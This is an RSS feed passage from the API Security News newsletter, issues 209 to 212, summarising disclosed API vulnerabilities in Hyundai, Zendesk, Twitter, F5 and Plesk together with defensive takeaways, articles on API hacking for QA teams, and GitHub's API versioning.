<p>The post <a href="https://apisecurity.io/issue-213-supply-chain-vulnerability-ibm-cloud-hardcoded-api-keys-algolia-portal-json-based-sql-attacks/">Issue 213: Supply chain vulnerability in IBM Cloud, hardcoded API keys in Algolia portal, JSON-based SQL attacks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 212: Remote control of vehicles, API hacking for QA teams, API Top 10 walkthrough</title>
		<link>https://apisecurity.io/issue-212-remote-control-of-vehicles-api-hacking-for-qa-teams-api-top-10-walkthrough/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Sun, 15 Jan 2023 14:31:19 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10276</guid>

					<description><![CDATA[<p>This week, we have news of a critical API vulnerability that allowed a researcher to demonstrate a proof of concept attack allowing remote vehicle takeover. We have articles on three reasons why QA teams should learn API hacking and the new changes GitHub has made to API versioning to future-proof client code. Finally, we have [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-212-remote-control-of-vehicles-api-hacking-for-qa-teams-api-top-10-walkthrough/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-212-remote-control-of-vehicles-api-hacking-for-qa-teams-api-top-10-walkthrough/">Issue 212: Remote control of vehicles, API hacking for QA teams, API Top 10 walkthrough</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of a critical API vulnerability that allowed a researcher to demonstrate a proof of concept attack allowing remote vehicle takeover. We have articles on three reasons why QA teams should learn API hacking and the new changes GitHub has made to API versioning to future-proof client code. Finally, we have a great walkthrough of the OWASP API Security Top 10 using the <em>vAPI</em> vulnerable application.</p>
<h2>Vulnerability: Critical API vulnerability allows remote control of Hyundai and Genesis vehicles</h2>
<p>First up is the <a href="https://portswigger.net/daily-swig/critical-vulnerability-allowed-attackers-to-remotely-unlock-control-hyundai-genesis-vehicles" target="_blank" rel="noopener noreferrer">excellent research from Sam Curry</a> into an API vulnerability affecting the Hyundai and Genesis vehicle range. Curry created a proof of concept detailing the exploit and <a href="https://twitter.com/samwcyo/status/1597695281881296897" target="_blank" rel="noopener noreferrer">described the steps in detail</a> on this Twitter thread. Most worryingly, the proof of concept demonstrated how the vehicle engine could be controlled remotely. Fortunately, the researcher responsibly disclosed the vulnerability, and the manufacturers resolved the issue before the details were publicized.</p>
<p>I covered this vulnerability in detail in <a href="https://42crunch.com/api-breaches-review-h2-2022/" target="_blank" rel="noopener noreferrer">42Crunch&#8217;s webinar</a> on the breaches in H2 2022 in December. The root causes of the vulnerability are twofold: a lack of input sanitization and poorly constructed email validation regular expressions. The researcher discovered that once he had a valid registration on the web portal of the vehicle, he was able to tweak the registration email address (by adding control characters), which would issue a JWT using this &#8220;fake&#8221; email. So simply by knowing a user&#8217;s email, an attacker could spoof a login and gain a token that would allow full vehicle access.</p>
<p>The screenshot below demonstrates the creation of a token with a tweaked email:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10338" src="https://apisecurity.io/wp-content/uploads/2023/01/Article1-1024x375.jpg" alt="" width="626" height="229" srcset="https://apisecurity.io/wp-content/uploads/2023/01/Article1-1024x375.jpg 1024w, https://apisecurity.io/wp-content/uploads/2023/01/Article1-300x110.jpg 300w, https://apisecurity.io/wp-content/uploads/2023/01/Article1-768x281.jpg 768w, https://apisecurity.io/wp-content/uploads/2023/01/Article1-320x117.jpg 320w, https://apisecurity.io/wp-content/uploads/2023/01/Article1-640x235.jpg 640w, https://apisecurity.io/wp-content/uploads/2023/01/Article1-360x132.jpg 360w, https://apisecurity.io/wp-content/uploads/2023/01/Article1-720x264.jpg 720w, https://apisecurity.io/wp-content/uploads/2023/01/Article1-1080x396.jpg 1080w, https://apisecurity.io/wp-content/uploads/2023/01/Article1-800x293.jpg 800w, https://apisecurity.io/wp-content/uploads/2023/01/Article1.jpg 1165w" sizes="auto, (max-width: 626px) 100vw, 626px" /></p>
<p>The key takeaways here are:</p>
<ul>
<li><strong>Never trust user input: </strong>in this case, an attacker could provide a &#8220;tweaked&#8221; email address that was not sanitized adequately.</li>
<li><strong>Use hardened/trusted regular expressions:</strong> the email validation methods accepted clearly invalid email addresses.</li>
<li><strong>Segment your access control:</strong> in this case, the management portal issued a &#8220;super token&#8221; which allowed engine control. For such high-risk methods, use an out-of-band mechanism or a higher-privilege token.</li>
</ul>
<h2>Article: Three reasons QA teams should learn API hacking</h2>
<p>A regular contributor to the newsletter Dana Epp (<a href="https://twitter.com/DanaEpp" target="_blank" rel="noopener noreferrer">@DanaEpp</a>), recently <a href="https://danaepp.com/3-reasons-why-qa-people-should-get-into-api-hacking" target="_blank" rel="noopener noreferrer">published another excellent blog</a>. This time he shares his thoughts on the value of quality assurance (QA) teams learning the basics of API hacking and using an offensive mindset.</p>
<p>As shift-left is embraced and developers are increasingly empowered to test their own software, many of the more elementary security flaws can be detected early in the lifecycle. Unfortunately, many of the more complex business logic security vulnerabilities require expert skills, and the best-placed team to do such testing is the venerable QA team. However, typically, these teams do not have the perspective of an attacker, namely an offensive mindset. Epp suggests three top reasons a QA team should develop such skills, namely:</p>
<ul>
<li><strong>You’ll deliver more value:</strong> from a personal career development perspective learning diverse skills such as API hacking is only going to stand you in good stead for future opportunities. The shortage of skilled security professionals is likely to persist, and having experience in this field is a big plus on your resume.</li>
<li><strong>Becoming the villain turns you into the hero:</strong> often, the QA or test team is seen as a blocker to timely software delivery. However, the only thing worse than a delayed delivery is a delivery with a glaring security flaw. As the last line of defense in the testing chain, you could save the day for your developers and company.</li>
<li><strong>Security is everyone’s responsibility:</strong> although something of a cliche, that does not invalidate the truth in the fact that security is everyone&#8217;s responsibility, or at least one should not assume somebody else might be responsible. You might very well be that person, so make sure you test like it is!</li>
</ul>
<p>In my experience of working with testers across various industries, I can only echo these thoughts, particularly the first point. I always used to know who the most security-savvy testers were and ensured they were on my projects.</p>
<p>How do QA teams get started developing an offensive mindset and learning to hack? For openers, Epp has an <a href="https://content.vulscan.com/api-hacking-guide" target="_blank" rel="noopener noreferrer">excellent guide</a> on API hacking resources, which I&#8217;d start with, and my suggestions would be as follows:</p>
<ul>
<li>Learn how real-world hacks take place (please encourage your QA times to subscribe to this newsletter).</li>
<li>Start learning the tools (Postman, Burp Suite, etc) with some deliberately vulnerable apps.</li>
<li>Learn some hands-on skills and perhaps become certified — the <em>API Penetration Testing</em> course from Corey Ball comes highly recommended.</li>
</ul>
<p>Happy hacking!</p>
<h2>Article: GitHub unveils next generation API versioning</h2>
<p>API versioning is important for your API strategy to ensure that you can update your API to add new features, but at the same time, ensure that you do not break existing clients and integrations due to breaking changes. Typically organizations have relied on basic numeric sequencing (i.e. a v1, v2, v3 instance of an API), but this approach lacks granularity, particularly when the provider wants to make a breaking change. GitHub has <a href="https://github.blog/2022-11-28-to-infinity-and-beyond-enabling-the-future-of-githubs-rest-api-with-api-versioning/" target="_blank" rel="noopener noreferrer">recently introduced a change</a> to its versioning strategy, which is now based on a date-based versioning scheme.</p>
<p>It works as follows — if no version is specified, the latest version will be used. A client can use the <code>X-GitHub-Api-Version</code> header to force a specific API version. GitHub guarantees that the previous version of an API will be available for a minimum of 24 months.</p>
<p>Why does API versioning matter to API security? On the positive side, having a formal system of API versioning means there is less likelihood of shadow or zombie APIs since there is a formalized process around the governance of APIs. On the negative side, a more fluid versioning system such as that adopted by GitHub means there are likely to be many more versions of APIs in production, which all need to be tracked and monitored for security issues.</p>
<p>It will be interesting to see how the industry adapts to GitHub&#8217;s new strategy — I can see both good and bad in it.</p>
<h2>Guide: OWASP API Security Top 10 walkthrough</h2>
<p>Finally this week, <a href="https://securedelivery.io/articles/api-top-ten-walkthrough/" target="_blank" rel="noopener noreferrer">we have a great walkthrough</a> of the OWASP API Security Top 10 from Grant Ongers (<a href="https://twitter.com/rewtd" target="_blank" rel="noopener noreferrer">@rewtd</a>) using the excellent <a href="https://github.com/roottusk/vapi" target="_blank" rel="noopener noreferrer">vAPI</a> vulnerable API application. The guide uses vAPI running in Docker and demonstrates each of the Top 10 using Postman and ZAP as the base tools.</p>
<p>It&#8217;s a very written walkthrough with plenty of detailed screenshots showing the attack setup and the stages of the exploit. Not only that, but he also provides great explanations of the underlying API issues.</p>
<p>Thanks to Grant for contributing this excellent learning resource to the community.</p>
<p>The post <a href="https://apisecurity.io/issue-212-remote-control-of-vehicles-api-hacking-for-qa-teams-api-top-10-walkthrough/">Issue 212: Remote control of vehicles, API hacking for QA teams, API Top 10 walkthrough</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 211: SQLi vulnerability in Zendesk Explore, Twitter API vulnerability, API threats to data-driven enterprises</title>
		<link>https://apisecurity.io/issue-211-sqli-vulnerability-zendesk-explore-twitter-api-vulnerability-api-threats-data-driven-enterprises/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 08 Dec 2022 22:06:50 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10271</guid>

					<description><![CDATA[<p>This week, we have news of a vulnerability in the API of the Zendesk Explore platform allowing an attacker to inject malicious SQL payloads. We also have coverage of the recent breach affecting up to 5.4 million users of the Twitter platform. We also have two articles — the first is an article on the [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-211-sqli-vulnerability-zendesk-explore-twitter-api-vulnerability-api-threats-data-driven-enterprises/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-211-sqli-vulnerability-zendesk-explore-twitter-api-vulnerability-api-threats-data-driven-enterprises/">Issue 211: SQLi vulnerability in Zendesk Explore, Twitter API vulnerability, API threats to data-driven enterprises</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of a vulnerability in the API of the Zendesk Explore platform allowing an attacker to inject malicious SQL payloads. We also have coverage of the recent breach affecting up to 5.4 million users of the Twitter platform. We also have two articles — the first is an article on the threats posed to data-driven enterprises due to API attacks, and the second is a report on the 257% increase in API attacks on financial services.</p>
<h2>Vulnerability: SQL injection vulnerability in Zendesk Explore API</h2>
<p>This week Varonis Threat Labs <a href="https://latesthackingnews.com/2022/11/24/numerous-vulnerabilities-spotted-in-zendesk-explore/" target="_blank" rel="noopener noreferrer">reported two vulnerabilities</a> within the popular Zendesk ticketing and support system affecting their Explore component. The first was an SQL injection vulnerability allowing attackers to inject arbitrary commands into the underlying database. The second issue involved a vulnerability in an API endpoint that provided an execute-query function to modify platform documents. Due to a weakness in the implementation, the researchers discovered that the API endpoint did not validate that the API caller had permission to access the data records specified and could modify queries to extract arbitrary data from other database tables.</p>
<p>The researchers reported that the flaws could have allowed an adversary to access the Zendesk core and exfiltrate conversations, email addresses, tickets, comments, and other information. Zendesk has since patched the vulnerabilities, and the researchers have confirmed that the vulnerabilities are no longer exploitable.</p>
<p>This sounds like a fairly typical case of <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">API1:2019 — Broken object level authorization</a> — in this case, the API failed to validate that the caller had permission to access the tables specified or execute the queries provided.</p>
<h2>Breach: Twitter API vulnerability leaks data from 5.4 million users</h2>
<p>The other big news this week is <a href="https://venturebeat.com/security/twitter-breach-api-attack/" target="_blank" rel="noopener noreferrer">further detail of the recent data leak</a> from Twitter affecting up to 5.4 million users. The attack is believed to have been committed in December 2021. According to privacy advocates and researchers, compromised account details (typically email addresses or phone numbers) are still available for sale online.</p>
<p>This breach exposes how easily a motivated attack can use a relatively benign flaw to harvest large volumes of valuable data for use in subsequent targeted attacks. In this case, the attacker targeted a Twitter login API endpoint and randomized the submitted email using publicly available email lists. The API would always return a failure (unless the attacker miraculously guessed the password); however, what was interesting to the attacker was the body of the response returned. If a valid email were submitted, the API would return a failure code but within the response, it also returned the email address and the phone number associated with the account. So by guessing email addresses, the attacker could get Twitter to confirm they were associated with a valid Twitter account.</p>
<p>Twitter confirmed the breach in <a href="https://privacy.twitter.com/en/blog/2022/an-issue-affecting-some-anonymous-accounts" target="_blank" rel="noopener noreferrer">August this year</a>, and the vulnerability has since been remediated. While the existence of an account does not in itself represent a risk to a user, it would allow an attacker to target users with phishing attacks or social attacks.</p>
<p>From an API security point of view, there are potentially two issues at play here, namely:</p>
<ul>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure" target="_blank" rel="noopener noreferrer">API3:2019 — Excessive data exposure</a> : in this scenario, the API endpoint should not have returned identifiable data such as email or phone number.</li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api7-security-misconfiguration" target="_blank" rel="noopener noreferrer">API7:2019 — Security misconfiguration</a> : avoid leaking useful information in the event of a failed operation. Simply the fact that the response body for an existent versus non-existent email was enough to provide an attacker with the result he needed.</li>
</ul>
<h2>Article: API security driving threats to data-driven enterprises</h2>
<p>Since APIs are primarily conduits to data within an organization, it is hardly surprising that <a href="https://www.cysecurity.news/2022/11/how-api-security-is-emerging-as.html" target="_blank" rel="noopener noreferrer">data-driven enterprises are at the most risk</a> of insecure APIs. Due to their public nature (exposed on public networks and documented in the public domain), APIs are a relatively easy target for attackers. Combining this with the relatively high value of the data exposed by APIs results in an increasing threat to APIs.</p>
<p>The article identifies three main causes of insecure APIs, namely:</p>
<ul>
<li><strong>Authentication flaws:</strong> as readers will be aware; authentication flaws are one of the top causes of insecure APIs. Make sure that you use consistent implementations of authentication handlers using standard patterns and components.</li>
<li><strong>Lack of encryption:</strong> never use an HTTP channel for APIs, and ensure that HTTPS is enforced with an appropriate security configuration.</li>
<li><strong>Flawed endpoint security:</strong> ensure that potentially more vulnerable IoT device are implemented and tested adequately.</li>
</ul>
<p>The article concludes by stressing the value of a design-first security approach for new API development.</p>
<h2>Article: Attacks on financial services APIs up by 257%</h2>
<p>In brief, we have some key takeaways from <a href="https://venturebeat.com/security/web-application-and-api-attacks/" target="_blank" rel="noopener noreferrer">recent research by Akamai Technologie</a>s into the prevalence of web application and API attacks against financial service institutions year-over-year. Their report concludes that the occurrence of attacks has increased by as much as 257% and that distributed Denial-of-Service attacks have increased by 20%.</p>
<p>The report&#8217;s authors identify two primary reasons for this trend: firstly, the attack surface is growingly rapidly and providing more opportunities to attackers, and secondly, organizations lack the requisite skills to protect their assets. They also suggest that the ease with which API attacks can be automated is a major contributing factor to the increase in API-based attacks.</p>
<p>There are probably no great surprises here for readers of the newsletter, but it is always instructive to see the current trends and observations.</p>
<h2>Webinar: Review of the Major API Breaches from H2 2022</h2>
<p><a href="https://42crunch.com/api-breaches-review-h2-2022/" target="_blank" rel="noopener noreferrer">Join me next Tuesday</a> (December 13th, 2022 | 8am PST | 4pm BST) when I review some of the major API breaches that occurred in the second half of this year. In this practical webinar, I outline the API vulnerabilities that were compromised during the attacks and show how to protect against them.</p>
<p>In this session, we will cover the following:</p>
<ul>
<li>Gain an understanding of how the API vulnerabilities occurred and the resulting impact.</li>
<li>Examination of the underlying OWASP API security Top 10 flaws.</li>
<li>Demonstration of how 42Crunch can detect and protect from such vulnerabilities.</li>
</ul>
<p><a href="https://42crunch.com/api-breaches-review-h2-2022/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-10285" src="https://apisecurity.io/wp-content/uploads/2022/12/Article5.jpg" alt="" width="603" height="177" /></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-211-sqli-vulnerability-zendesk-explore-twitter-api-vulnerability-api-threats-data-driven-enterprises/">Issue 211: SQLi vulnerability in Zendesk Explore, Twitter API vulnerability, API threats to data-driven enterprises</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 210: CSRF vulnerability in F5, supply chain attacks, hacking APIs, GCP API security report</title>
		<link>https://apisecurity.io/issue-210-csrc-vulnerability-f5-supply-chain-attacks-hacking-apis-gcp-api-security-report/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 30 Nov 2022 09:02:39 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10238</guid>

					<description><![CDATA[<p>This week, we have news of another CSRF vulnerability affecting an API, this time in the F5 BIG-IP device. We also have an article from Dark Reading on the next generation of supply chain attacks, a quick guide on how to hack APIs, and finally, a very illuminating report from Google Cloud on API security [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-210-csrc-vulnerability-f5-supply-chain-attacks-hacking-apis-gcp-api-security-report/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-210-csrc-vulnerability-f5-supply-chain-attacks-hacking-apis-gcp-api-security-report/">Issue 210: CSRF vulnerability in F5, supply chain attacks, hacking APIs, GCP API security report</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of another CSRF vulnerability affecting an API, this time in the F5 BIG-IP device. We also have an article from Dark Reading on the next generation of supply chain attacks, a quick guide on how to hack APIs, and finally, a very illuminating report from Google Cloud on API security research findings in 2022.</p>
<h2>Vulnerability: CSRF vulnerability in F5 BIG-IP</h2>
<p>Last week we featured a CSRF vulnerability in the Plesk server administration user interface, and<a href="https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/" target="_blank" rel="noopener noreferrer"> this week</a> we have a CSRF API vulnerability affecting the F5 BIG-IP device. Security researchers at Rapid7 discovered that the endpoint <code>/iControl/iControlPortal.cgi</code> lacks cross-site request forgery (CSRF) protection, nor does it require a correct <code>Content-Type</code> or other typical API protections. To exploit this weakness, an attacker lures a user (who has an authenticated session to an F5 BIG-IP device) to his website, from where the attacker can launch arbitrary API commands to the F5 backend API using the privileges of the target user.</p>
<p>Standard protections against CSRF attacks include the use of built-in CSRF protections in your framework, the use of the synchronizer token pattern or the double submit cookie pattern. All of these are covered in detail in the <a href="https://42crunch.com/defending-apis-with-jim-manico-episode-1/?__hstc=78516299.7bcb9077c39d14cf1e72b9bc1b15ab01.1654093240758.1668714820923.1669668405036.46&amp;__hssc=78516299.1.1669668405036&amp;__hsfp=3234665583" target="_blank" rel="noopener noreferrer">popular webinar</a> with Jim Manico from earlier in the month.</p>
<p>The researcher has <a href="https://github.com/rbowes-r7/refreshing-soap-exploit" target="_blank" rel="noopener noreferrer">provided a GitHub repository</a> showing several proof-of-concept exploits which are worth reviewing — CSRF is an old attack vector but still prevalent in the API-centric world.</p>
<h2>Article: Next generation of supply chain attacks</h2>
<p>Supply chain attacks are the new emerging threat du jour in DevSecOps land, and not without good cause. As the monolith is decomposed and software is assembled rather than written, so risk is inherited from the upstream supply chain. This <a href="https://www.darkreading.com/attacks-breaches/the-next-generation-of-supply-chain-attacks-is-here-to-stay" target="_blank" rel="noopener noreferrer">excellent article from Dark Reading</a> discusses the topic in much greater depth, including their thoughts on how APIs (and their keys) are one of the leading concerns in software supply chains.</p>
<p>Traditionally, supply chain risks are considered vulnerabilities in software dependencies passed downstream — the canonical example is vulnerabilities in open-source components aggregated into an end product. Recently this supply chain weakness has received focus at the highest level from none other than the U.S. President in an <a href="https://www.whitehouse.gov/briefing-room/presidential-actions/2021/05/12/executive-order-on-improving-the-nations-cybersecurity/" target="_blank" rel="noopener noreferrer">executive order</a>.</p>
<p>Now, what does the modern supply chain look like? Typically modern software is constructed using hyperconnected systems, for example, 3rd party provider APIs, CI/CD systems, and various Cloud hosting services. These systems are all connected via APIs and, of course, their associated keys and tokens. This dramatic growth of the supply chain to include all interconnected services and dependencies creates challenges to security teams in firstly understanding their total attack surface and then addressing the impost important weaknesses. Remember, a chain is only as strong as its weakest link.</p>
<p>One of the easiest wins for reducing the blast radius of any attack against software supply chains is to reduce the scope of API keys and tokens, either by reducing their privileges, scope, and lifetime. The author highlights two recent examples of SaaS providers who have changed their API key and token scopes to minimize the impact of leakage, namely:</p>
<ul>
<li><a href="https://developers.hubspot.com/docs/api/migrate-an-api-key-integration-to-a-private-app" target="_blank" rel="noopener noreferrer">Hubspot</a> help eliminate potential risks associated with the use of API keys.</li>
<li><a href="https://github.blog/2022-10-18-introducing-fine-grained-personal-access-tokens-for-github" target="_blank" rel="noopener noreferrer">GitHub</a> introduced a fine-grained personal access token that offers enhanced security to developers and organization owners.</li>
</ul>
<p>A timely guide to protecting API keys and tokens in your supply chains.</p>
<h2>Guide: How to hack APIs</h2>
<p>Guides on API hacking are always popular with readers of the newsletter, and this week, <a href="https://twitter.com/intigriti/status/1592135581479632899" target="_blank" rel="noopener noreferrer">we feature another list</a> of resources courtesy of INTIGRITI on Twitter. In summary, the following great resources are covered:</p>
<ul>
<li>Everything API Hacking on <a href="https://www.youtube.com/playlist?list=PLbyncTkpno5HqX1h2MnV6Qt4wvTb8Mpol" target="_blank" rel="noopener noreferrer">YouTube</a></li>
<li>OWASP API Security Top 10 project</li>
<li>Inon Shkedy&#8217;s 31 days API Security Tips</li>
<li>OWASP crAPI project</li>
</ul>
<p>Another great list of resources to be bookmarked.</p>
<h2>Report: Google Cloud 2022 API security research report</h2>
<p>Finally, this week <a href="https://cloud.google.com/resources/api-security-research-report" target="_blank" rel="noopener noreferrer">we have an excellent report</a> from Google Cloud on API security in 2022. Although it is behind a registration wall, I highly recommend this for anyone working in API security and wanting to understand current trends. The report contains a wealth of interesting statistics relating to API security; some of the highlights include the following:</p>
<ul>
<li>62% of C-Suite executives reported they had experienced a security incident.</li>
<li>API security threats come from misconfigured APIs (40%), and outdated APIs (35%).</li>
<li>Concerningly, over three-quarters of organizations, delayed a product release due to a security incident.</li>
<li>Only 40% of organizations had a complete API security strategy in place.</li>
</ul>
<p>Most interesting to me was the validation of the shift-left approach toward API security, with the majority of respondents focusing on the proactive identification of security threats and the adoption of automation and orchestration:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-10266" src="https://apisecurity.io/wp-content/uploads/2022/11/Article5-1.png" alt="" width="609" height="250" /></p>
<p>An interesting report sounding a generally optimistic note for API security.</p>
<h2>Event: API Days Paris &#8211; December 14-16</h2>
<p>As a loyal subscriber to the newsletter, 42Crunch is happy to invite you to apidays Paris 2022, APIs for the next ten years: Software, Society, Sovereignty, Sustainability, from December 14-16 2022.</p>
<p>Isabelle Mauny, our co-founder and Field CTO, will be joining other illustrious speakers next month at the event and presenting two sessions on:&#8221;The State of OpenAPI&#8221; &amp; &#8220;Anatomy of Recent API Breaches with Lessons Learned.&#8221;</p>
<p>There will be 3,000 attendees (Developers, IT Managers, CTOs, CIOs, VP Engineers, Architects, PMs, etc.), and the 200+ speaker lineup includes:</p>
<ul>
<li>Mark O’Neill, VP Analyst, Chief of Research for Software Engineering at Gartner</li>
<li>Mike Amundsen, Author at amundsen Inc.</li>
<li>Gilles Babinet, Co-Chairman at Conseil National du Numérique and Digital Champion pour la France à la Commission Européenne</li>
</ul>
<p>Because apidays loves our community, they are offering us 30 free tickets (value of up to €799 each) with code &#8220;GUESTOF42CRUNCH&#8221; at <a href="https://www.apidays.global/paris/#buy-ticket" target="_blank" rel="noopener noreferrer">checkout through this link</a>. First come, first served, and we hope to see you there!</p>
<p><a href="https://www.apidays.global/paris/#buy-ticket" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-10241" src="https://apisecurity.io/wp-content/uploads/2022/11/API_Days_Paris.png" alt="" width="486" height="173" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-210-csrc-vulnerability-f5-supply-chain-attacks-hacking-apis-gcp-api-security-report/">Issue 210: CSRF vulnerability in F5, supply chain attacks, hacking APIs, GCP API security report</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 209: CSRF in Plesk API-enabled server, top five API security myths, Ory Hydra authentication server</title>
		<link>https://apisecurity.io/issue-209-csrf-in-plesk-api-enabled-server-top-five-api-security-myths-ory-hydra-authentication-server/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 17 Nov 2022 19:48:01 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=10209</guid>

					<description><![CDATA[<p>This week, we have new research from FORTBRIDGE that reveals a client-side request forgery (CSRF) vulnerability in API-enabled instances of  Plesk, the popular server administration portal. We also have an article on the top five API security myths according to Hacker News, a quick look at the Ory Hydra OAuth2/OIDC server, and a guide to [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-209-csrf-in-plesk-api-enabled-server-top-five-api-security-myths-ory-hydra-authentication-server/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-209-csrf-in-plesk-api-enabled-server-top-five-api-security-myths-ory-hydra-authentication-server/">Issue 209: CSRF in Plesk API-enabled server, top five API security myths, Ory Hydra authentication server</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have new research from FORTBRIDGE that reveals a client-side request forgery (CSRF) vulnerability in API-enabled instances of  Plesk, the popular server administration portal. We also have an article on the top five API security myths according to Hacker News, a quick look at the Ory Hydra OAuth2/OIDC server, and a guide to some awesome BurpSuite extensions.</p>
<h2>Vulnerability: CSRF in Plesk API-enabled server</h2>
<p><a href="https://portswigger.net/daily-swig/csrf-in-plesk-api-enabled-server-takeover" target="_blank" rel="noopener noreferrer">First up this week is breaking research</a> from our friends at FORTBRIDGE which uncovered a <a href="https://portswigger.net/web-security/csrf" target="_blank" rel="noopener noreferrer">CSRF</a> vulnerability in the REST API of the popular server administration tool, Plesk. Plesk is widely used as an administrative front-end for web hosting and data center providers, and has generally been hardened and patched against security vulnerabilities.</p>
<p>During a recent project for a client, Adrian Tiron (managing partner at FORTBRIDGE) noticed that when the backend REST API is called from the web interface client, there are no defenses against CSRF. Basically, a CSRF attack allows an attacker to hijack an existing client&#8217;s session on a server to execute other operations. Typically, the defense for this would be to include a CSRF token that is unique to the request.</p>
<p>In this case, Tiron discovered that if an attacker could lure a Plesk administrator to a malicious website (such as through clickjacking type attacks), the attacker could then launch an attack against the Plesk server. One particular endpoint in the REST API supported miscellaneous commands, including an option to reset the administrator&#8217;s password. Given that Plesk is typically operating at high levels of privilege to administer servers, such a compromise could have a significant impact, such as allow various serious attacks like arbitrary file upload and complete takeover of the host server.</p>
<p>FORTBRIDGE responsibly disclosed this vulnerability to Plesk who responded rapidly to resolve the issue. At the time of writing, Plesk has reported that 89.4% of Plesk servers have already been automatically updated. For technically-minded readers, I would highly recommend the <a href="https://fortbridge.co.uk/research/compromising-plesk-via-its-rest-api/" target="_blank" rel="noopener noreferrer">excellent write-up</a> by Tiron on their website — that old dog certainly does know some tricks <img src="https://s.w.org/images/core/emoji/16.0.1/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<p>The key takeaway for developers here is to ensure that all <code>POST</code> requests that change the server state have CSRF mitigation implemented. The two standard patterns for CSRF defense are the <em>synchronizer token pattern</em> or the <em>double submit cookie pattern</em>. If anyone wants to know more about CSRF — in particular the <em>double submit cookie pattern —</em> I can recommend the <a href="https://42crunch.com/defending-apis-with-jim-manico-episode-1/" target="_blank" rel="noopener noreferrer">excellent webinar</a> I hosted with Jim Manico just last week, where he covered the topic in great detail.</p>
<h2>Article: Top five API security myths</h2>
<p>API security is a vast, sprawling topic with many diverse opinions and views, and often beset with misconceptions that can result in serious risk. This week Hacker News has featured their own views on the <a href="https://thehackernews.com/2022/11/top-5-api-security-myths-that-are.html" target="_blank" rel="noopener noreferrer">top five myths surrounding API security</a>, briefly summarized as:</p>
<ul>
<li><strong>API gateways, existing IAM tools, and WAFs are enough to secure API</strong>: This is probably the most frequently encountered misconception I face in discussions with security teams. All of the existing security tools offer value in reducing the risk exposed through APIs. However, <a href="https://thenewstack.io/application-security-tools-are-not-up-to-the-job-of-api-security/" target="_blank" rel="noopener noreferrer">many legacy tools are not up to the task of securing APIs</a>, and many API vulnerabilities could not be prevented by using a tool. Proper threat assessment, solid design, defensive coding, and proper testing are as important as the tools.</li>
<li><strong>API security is simple</strong>: This insight will come as no surprise to readers of this newsletter. API security is a challenging undertaking, and the attackers are nearly always one step ahead.</li>
<li><strong>Developers will always bake security into APIs</strong>: While developers are increasingly aware of the need to incorporate security into their code as early as possible, they face various other demands and constraints, such as performance, functionality, or delivery. Security is not <a href="https://devops.com/empathy-for-the-api-developer/" target="_blank" rel="noopener noreferrer">always their top priority</a>.</li>
<li><strong>Cloud providers secure APIs by default</strong>: One of the great promises of the cloud is that it is &#8220;secure by default&#8221; and that the cloud provider handles most of the security considerations. The shared security model adopted by cloud providers is quite explicit in stipulating that the responsibility for both application and data security lies with the end user.</li>
<li><strong>Zero Trust is enough to secure APIs</strong>: It is probably self-evident that there is no silver bullet for API security. While Zero Trust is a worthwhile approach, it is only one part of a much bigger picture.</li>
</ul>
<p>The author makes some useful observations in this article — in my view, API security is a multi-faceted undertaking, and the best approach is a layered approach with defense in depth.</p>
<h2>Tool: Ory Hydra OAuth2/OIDC server</h2>
